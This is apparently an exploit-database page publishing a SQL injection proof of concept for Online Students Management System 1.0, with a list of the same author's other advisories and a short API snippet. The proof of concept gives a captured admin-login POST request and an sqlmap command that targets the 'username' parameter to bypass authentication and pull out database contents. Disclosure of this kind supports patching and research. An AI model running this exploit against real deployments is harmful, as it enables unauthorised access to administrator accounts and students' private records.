Now you can request a feature, improvement or collaborate with us.
Author
"George Tsimpidas"
Platform
php
Release date
2020-10-12
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 | # Title: Online Students Management System 1.0 - 'username' SQL Injections # Exploit Author: George Tsimpidas # Date: 2020-10-09 # Vendor Homepage: www.sourcecodester.com # Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/studentrecord_0.zip # Version : 1.0 # Tested on: Ubuntu 18.04.5 LTS (Bionic Beaver) # Category: Webapp # Description The files index.php on the main login page, and the index.php on the /admin/ login page does not perform input validation on the regno and username parameters. An attacker can send malicious input in the post request to http://localhost/index.php or either http://localhost/admin/index.php and bypass authentication, extract sensitive information etc. #POC 1) Navigate to the admin login page Example: http://localhost/admin/index.php 2) Fill in dummy values for 'username' and 'password' fields and send the request via an HTTP intercept tool 3) Save the request to file. Example, student_record_sqli.req POST /admin/index.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 32 Origin: http://localhost DNT: 1 Connection: close username=admin&password=dummy 4) Run SQLmap on the file, sqlmap -r student_record_sqli.req --dbms=mysql --threads=10 -p username |
Release Date | Title | Type | Platform | Author |
---|---|---|---|---|
2020-10-14 | "Guild Wars 2 - Insecure Folder Permissions" | local | windows | "George Tsimpidas" |
2020-10-13 | "Battle.Net 1.27.1.12428 - Insecure File Permissions" | local | windows | "George Tsimpidas" |
2020-10-12 | "Liman 0.7 - Cross-Site Request Forgery (Change Password)" | webapps | multiple | "George Tsimpidas" |
2020-10-12 | "Online Students Management System 1.0 - 'username' SQL Injections" | webapps | php | "George Tsimpidas" |
2020-08-31 | "Mara CMS 7.5 - Reflective Cross-Site Scripting" | webapps | php | "George Tsimpidas" |
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48870/?format=json')
For full documentation follow the link above